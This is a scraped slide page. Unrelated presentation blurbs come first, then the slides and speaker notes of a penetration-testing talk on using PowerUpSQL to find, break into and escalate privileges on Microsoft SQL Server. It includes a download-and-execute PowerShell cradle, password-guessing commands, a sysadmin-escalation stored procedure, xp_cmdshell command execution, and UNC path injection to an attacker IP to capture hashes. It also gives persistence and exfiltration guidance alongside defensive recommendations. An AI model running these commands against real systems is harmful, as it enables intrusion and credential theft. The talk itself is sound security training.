https://www.rttsweb.com/jmeter-integration-webinar
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
3. Presentation Overview
● Why SQL Server and PowerShell?
● PowerUpSQL Overview
● Finding & Accessing SQL Servers
● Privilege Escalation Scenarios
o Domain user to SQL Server login
o SQL Server Login to Sysadmin
o Sysadmin to Windows Admin
o Windows Admin to Sysadmin
o Domain Escalation
● Post Exploitation Activities
● General Recommendations
4. Why SQL Server?
● Used in most enterprise environments
● Supports local Windows and Domain authentication
● Integrates with lots of Windows applications
● Generally has trust relationships that other don’t
5. Why PowerShell?
● Native to Windows
● Run commands in memory
● Run managed .net code
● Run unmanaged code
● Avoid detection by legacy Anti-virus
● Already flagged as "trusted" by most
application whitelist solutions
● A medium used to write many open source
Pentest toolkits
7. PowerUpSQL Overview: Project Goals
Project Goals (Get-Abilities)
● Scalability via runspace threading
● Flexibility via pipeline support
● ps objects and data tables
● Portability
o No SMO dependancies
o .Net Framework libraries
o PowerShell v.2 compliant (in theory)
o Single file
Functional Goals
● Discover SQL Servers from different attacker perspectives
● Inventory SQL Servers quickly
● Audit SQL Servers for common insecure configurations
● Escalate privileges quickly on SQL Servers
● Support authentication using SQL Login or Windows Credential
9. PowerUpSQL Overview: Where can I get it?
Github
https://github.com/netspi/PowerUpSQL
PowerShell Gallery
https://www.powershellgallery.com/packages/PowerUpSQL/
10. PowerUpSQL Overview: How do I install it?
Github
Import-Module PowerUpSQL.psd1
IEX(New-Object
System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/P
owerUpSQL.ps1")
Execution policy work arounds
https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
PowerShell Gallery
Install-Module -Name PowerUpSQL
12. SQL Server Basics
What is SQL Server?
● A database platform
● An application
● A set of Windows services
● Each instance has its own set of
services
13. SQL Server Basics: Account Types
Account Types
● Windows Accounts
o Used to login
o Mapped to SQL Server login
● SQL Server Logins
o Used to login
o Mapped to database account
● Database Users
o Used to access databases
14. SQL Server Basics: Common Roles
Important SQL Server Roles
● Sysadmin role
○ Database administrator account
○ Think of it as the “Administrators” Windows group,
but in SQL Server
● Public role
○ Only provides CONNECT permission
○ Think of it as the “Everyone” Windows group, but
in SQL Server
16. Find SQL Servers: Techniques
Attacker Perspective Attack Technique
Unauthenticated ● List from file
● TCP port scan
● UDP port scan
● UDP broadcast
● Azure DNS dictionary attack (x.databases.windows.net)
● Azure DNS lookup via public resources
Local User ● Services
● Registry entries
Domain User ● Service Principal Names
● Azure Portal / PowerShell Modules
17. Find SQL Servers: PowerUpSQL
Attacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
19. Testing Login Access: Techniques
What credentials can I use to log into discovered SQL Servers?
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords.
Unauthenticated Default passwords based on the SQL Server instance names.
Local Windows or ADS
Domain Account
Attempt to login using the current account.
20. Testing Login Access: PowerUpSQL CMDs
What PowerUpSQL functions can I use to test for successful logins?
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
Get-SQLServerLoginDefaultPw
Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose
Local Windows or ADS
Domain Account
Get-SQLConnectionTestThreaded
22. Testing Login Access: Login CMD Examples
Attacker Perspective Command Example
Unauthenticated Get-SQLInstanceUDPScan | Get-SQLConnectionTestThreaded
-Verbose -Threads 15 -Username testuser -Password testpass
Local User Get-SQLInstanceLocal | Get-SQLConnectionTestThreaded -Verbose
Domain User Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
-Verbose -Threads 15
Alternative
Domain User
runas /noprofile /netonly /user:domainuser PowerShell.exe
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
-Verbose -Threads 15
23. Testing Login Access: Reusing Result Lists
Process Command Example
Enumerate
Accessible Servers
$Accessible = Get-SQLInstanceDomain |
Get-SQLConnectionTestThreaded -Verbose -Threads 15 |
Where-Object {$_.Status –like “Accessible”}
Get server information $Acessible | Get-SQLServerInfo -Verbose
Get database list $Acessible | Get-SQLDatabase -Verbose
Perform audit $Acessible | Invoke-SQLAudit -Verbose
Do I have to rerun instance discovery every time I want to run a command? No.
26. Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?
● Admins give them access
● Privilege inheritance issue on
domain systems = Public role
access
● SQL Server Express is commonly
vulnerable
27. Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?
● Admins give them access
● Privilege inheritance issue on
domain systems = Public role
access
● SQL Server Express is commonly
vulnerable
28. Escalating Privileges: Domain User
Why can Domain Users login into so
many SQL Servers?
● Admins give them access
● Privilege inheritance issue on
domain systems = Public role
access
● SQL Server Express is commonly
vulnerable
30. Escalating Privileges: Weak Passwords
Didn’t we just cover this? Yes, but there’s more…
Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
Local Windows or ADS
Domain Account
Get-SQLConnectionTestThreaded
31. Escalating Privileges: Weak Passwords
…we can also enumerate SQL Server logins and Domain Accounts
Technique PowerUpSQL Function
Blind Login Enumeration
+
Dictionary Attack
=
Super Cool!
Invoke-SQLAuditWeakLoginPw
• Enumerate all SQL Server logins with the Public role
• Enumerate all domain accounts with the Public role
32. Escalating Privileges: Weak Passwords
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
33. Escalating Privileges: Weak Passwords
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa
account with “suser_id”
34. Escalating Privileges: Weak Passwords
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa account
with “suser_id”
3. Use “suser_name” to get SQL
logins using just principal ID
35. Escalating Privileges: Weak Passwords
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa account
with “suser_id”
3. Use “suser_name” to get SQL
logins using just principal ID
4. Increment number and repeat
36. Escalating Privileges: Weak Passwords
Enumerating SQL Logins
1. Attempt to list all SQL Server
logins and fail.
2. Get principal id for the sa account
with “suser_id”
3. Use “suser_name” to get SQL
logins using just principal ID
4. Increment number and repeat
select n [id], SUSER_NAME(n) [user_name]
from (
select top 10000 row_number() over(order by t1.number) as N
from master..spt_values t1
cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null
Code gifted from @mobileck
Source:
https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
38. Escalating Privileges: Weak Passwords
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
Full RID of
Domain Admins
group
39. Escalating Privileges: Weak Passwords
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
40. Escalating Privileges: Weak Passwords
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
4. Create new RID with by appending
a hex number value and the SID
1. Start with number, 500
2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
41. Escalating Privileges: Weak Passwords
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
4. Create new RID with by appending a
hex number value and the SID
5. Use “suser_name” function to get
domain object name
1. Start with number, 500
2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
42. Escalating Privileges: Weak Passwords
Enumerating Domain Users
1. Get the domain
2. GID RID of default group
3. Grab the first 48 Bytes of the full RID
4. Create new RID with by appending a
hex number value and the SID
5. Use “suser_name” function to get
domain object name
6. Increment and repeat
1. Start with number, 500
2. Convert to hex, F401
3. Pad with 0 to 8 bytes, F4010000
4. Concatenate the SID and the new RID
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
45. Escalating Privileges: Impersonation
1. Impersonate Privilege
• Server: EXECUTE AS LOGIN
• Database: EXECUTE AS USER
2. Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER
• Signed with cert login
3. Automatic Execution of Stored Procedures
4. Agent Jobs
• User, Reader, and Operator roles
5. xp_cmdshell proxy acount
6. Create Databse Link to File or Server
7. Import / Install Custom Assemblies
8. Ad-Hoc Queries
9. Shared Service Accounts
10. Database Links
11. UNC Path Injection
46. Escalating Privileges: Impersonation
Impersonate Privilege
• Can be used at server layer
o EXECUTE AS LOGIN
• Can be used at database layer
o EXECUTE AS USER
Pros
• Execute queries/commands in another user context
Cons
• Commands and queries are not limited in any way
• Requires database to be configured as trustworthy
for OS command execution
49. Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
Cons
• No granular control over the database owner’s privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB,
which is often a sysadmin
• Requires database to be configured as trustworthy for
OS command execution
• Impersonation can be done via SQL injection under
specific conditions
• Impersonation can be done via command injection under
specific conditions
50. Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login
• DB_OWNER role can impersonate the actual
database owner
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember
'MyAppUser','sysadmin'
GO
51. Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• EXECUTE AS OWNER can be used to execute a
stored procedure as another login
• DB_OWNER role can impersonate the actual
database owner
USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember
'MyAppUser','sysadmin'
GO
SYSADMIN
is often the
OWNER
52. Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection
Issues
• Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Pros
• Can execute queries/commands in another user
context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as
trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection
under specific conditions
• Impersonation can be done via command
injection under specific conditions
53. Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = ‘
SELECT name FROM master..sysdatabases
WHERE name like ''%'+ @DbName+'%'' OR
name=''tempdb''';
EXECUTE(@query)
END
GO
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
54. Escalating Privileges: Impersonation
SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = ‘
SELECT name FROM master..sysdatabases
WHERE name like ''%'+ @DbName+'%'' OR
name=''tempdb''';
EXECUTE(@query)
END
GO
PURE EVIL
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
57. Escalating Privileges: Impersonation
Automatic Execution of Stored Procedure
• Stored procedures ca be configured to execute
when the SQL Server service restarts
Pros
• Marking a stored procedure to run when the SQL
Server service restarts has many use cases
• Only stored procedures in the master database
can be marked for auto execution
Cons
• No granular control over what context the startup
command is executed in
• All stored procedures marked for auto execution
are executed as ‘sa’, even if ‘sa’ is disabled
• Any non sysadmin access to stored procedures
can lead to execution as ‘sa’
63. Escalating Privileges: SysAdmin to Service Account
OS Command Execution = Service Account Impersonation
Executing OS Commands:
● xp_cmdshell
● Custom Assemblies (.net)
http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/
● Custom Extended Stored Procedures (C++)
● Agent Jobs
https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
o ActiveX: Vbscript, Jscript, and Other
o CmdExec
o PowerShell
o SSIS Package
● Registry Autoruns
● File Autoruns
64. Escalating Privileges: SysAdmin to Service Account
OS Command Execution = Service Account Impersonation
You don’t need to know the password, crack a hash, or PTH
Service Account Types
● Local User
● Local System
● Network Service
● Local managed service account
● Domain managed service account
● Domain User
● Domain Admin
65. Escalating Privileges: SysAdmin to Service Account
But wait, there’s more…RottenPotato @ DerbyCon 2016
• We can now escalation from service account to LocalSystem!
• No patch that I’m aware of.
• Authors: Chris Mallz (@vvalien1) & Steve Breen (@breenmachine)
Blog
https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-
escalation-from-service-accounts-to-system/
Code
https://github.com/foxglovesec/RottenPotato
66. Escalating Privileges: Invoke-SQLOSCmd
Invoke-SQLOSCMD can be used for basic command execution.
PS C:>$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10
ComputerName Instance CommandResults
--------------------- ----------- --------------
SQLServer1 SQLServer1SQLEXPRESS nt servicemssql$sqlexpress
SQLServer1 SQLServer1STANDARDDEV2014 nt authoritysystem
SQLServer1 SQLServer1 DomainSQLSvc
68. Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them!
One account to rule them all!
70. InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
71. InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Execute Local Command
via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
72. InternetDMZIntranet
LRA HVA
LVA
ADS
LVA
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Execute Local Command
via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and
gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
74. Escalating Privileges: Crawling SQL Server Links
What’s a SQL Server link?
● SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
● Short answer = privilege escalation
● Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’)
● Stored procedures can be executed (xp_cmdshell)
● Links can be crawled
75. InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
76. InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
77. InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
D
B
Link
w
ith
LeastPrivileges
DB1
LVA
78. InternetDMZIntranet
LRA HVA
LVA
ADS
Ports
80 and 443
Ports
1433 and 1434
HVA
PURE
EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
D
B
Link
w
ith
LeastPrivileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and
local commands on
database servers via
nested linked services
2
79. Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
● Database links exist (and can be crawled) in about 50% of environments we’ve seen
● The max number of hops we’ve seen is 12
● The max number of servers crawled is 226
80. Escalating Privileges: Crawling Server Links
Old Script
● Released 2012
● https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
● Author: Antti Rantasaari
● https://blog.netspi.com/sql-server-link-crawling-powerupsql/
81. Escalating Privileges: Crawling Server Links
Function Description
Get-SQLServerLink Get a list of SQL Server Link on the server.
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command
execution.
Examples
Get-SQLServerLinkCrawl -verbose -instance
"10.2.9.101SQLSERVER2008“
Get-SQLServerLinkCrawl -instance "10.2.9.101SQLSERVER2008" -Query
“select * from master..sysdatabases”
Get-SQLServerLinkCrawl -instance "10.2.9.101SQLSERVER2008" -Query
“exec master..xp_cmdshell ‘whoami’”
86. Escalating Privileges: UNC Path Injection
UNC Path Injection Summary
● UNC paths are used for accessing remote file servers like so 192.168.1.4file
● Almost all procedures that accept a file path in SQL Server, support UNC paths
● UNC paths can be used to force the SQL Server service account to authenticate to an attacker
● An attacker can then capture the NetNTLM password hash and crack or relay it
● Relay becomes pretty easy when you know which SQL Servers are using shared accounts
88. Escalating Privileges: UNC Path Injection
The Issue
• By DEFAULT, the PUBLIC role can execute at least two procedures that accept a file path
xp_dirtree 'attackeripfile‘
xp_fileexists 'attackeripfile‘
The Solution
• EXECUTE rights on xp_dirtree and fileexists can be REVOKED for the Public role
(but no one does that)
UNC Path Injection Cheat Sheet
• https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
89. Escalating Privileges: UNC Path Injection
Another Issue
• The Public role can perform UNC path injection into the BACKUP and RESTORE
commands:
BACKUP LOG [TESTING] TO DISK = 'attackeripfile‘
RESTORE LOG [TESTING] FROM DISK = 'attackeripfile'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
90. Escalating Privileges: UNC Path Injection
So, in summary…
The PUBLIC role can access the SQL
Server service account NetNTLM
password hash by default!!
91. Escalating Privileges: UNC Path Injection
But who really has
PUBLIC role access?
Oh yeah, a ton of domain users
95. Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges.
96. Escalating Privileges: OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode ? x x x x x
Below are some options for leveraging that knowledge...
97. Escalating Privileges: OS Admin to SysAdmin
Here are some tool options...
Approach Common Tools
Access as Local Administrator Management Studio, sqlcmd, and other native SQL client
tools.
Access as LocalSystem Psexec, accessibility options, debugger with native SQL
client tools.
Recover SQL Server service account
password from LSA Secrets
Mimikatz, Metasploit, lsadump.
Inject shellcode or DLL into the SQL
Server service process
Metasploit, Empire, Python, Powershell, C, C++
(LoadLibrary,CreateRemoteThread, and similar functions)
Steal Authentication Token From SQL
Server service process
Metasploit, Incognito, Invoke-TokenManipulation
Single User Mode DBATools
99. Post Exploitation: Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: Copy database, TCP ports, UDP ports, DNS tunneling,
ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL
yet)
106. General Recommendations
1. Enforce least privilege everywhere!
2. Disable dangerous default stored procedures.
3. Install security patches.
4. Audit and fix insecure configurations.
5. Use policy based management for standardizing configurations.
6. Enable auditing at the server and database levels, and monitor for potentially malicious activity.
107. PowerUpSQL Overview: Thanks!
Individual Third Party Code / Direct Contributors
Boe Prox Runspace blogs
Warren F. ( RamblingCookieMonster) Invoke-Parallel function
Oyvind Kallstad Test-IsLuhnValid function
Kevin Robertson Invoke-Inveigh
Joe Bialek Invoke-TokenManipulation
Antti Rantasaari, Eric Gruber, and Alexander
Leary, @leoloobeek, and @ktaranov
Contributions and QA
Khai Tran Design advice
NetSPI assessment team and dev team Design advice
COMMON USE CASES
phishing - clickonce, java applet, macro in office
Sql injection download craddle
Skip
Skip
Skip
Just touch on alternative user.
Skip
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
Cornucopia of excessive privileges.
You get sysadmins.
Architecture overview.
SQL injection.
Scenario
Database account with excessive privileges
Shared service account
Use xp_cmdshell to verify local command execution
Use xp_cmdshell and OSQL to:
Enumerate databases on the internal network
Issues queries on remote HVA database server that is configured with the same service account.
No alerts – using trusted account and non destructive native functionality
No logs (or few logs) – No account creation or group modification
No accountability!
Another REALLY COOL lateral movement / privilege escalation technique.
Architecture overview.
Scenario
No sysadmin role
No excessive service account access
No shared service account access
Enumerate linked servers
Find link to DB1 - Used to transmit marketing metrics to DB1
Connect to DB1 (linked server) via OPENQUERY
Has least privilege
Enumerate linked servers
Find link to HVA - Used to pull marketing metrics to DB1
Connect to HVA (linked server) via NESTED OPENQUERY
Configured with the SA account
HVA could have access to other resources
Nesting can continue
Nested Shared service account with excessive privs
Linked database can be
direct between high value and low value
Other server not on the diagram
Can be nested many times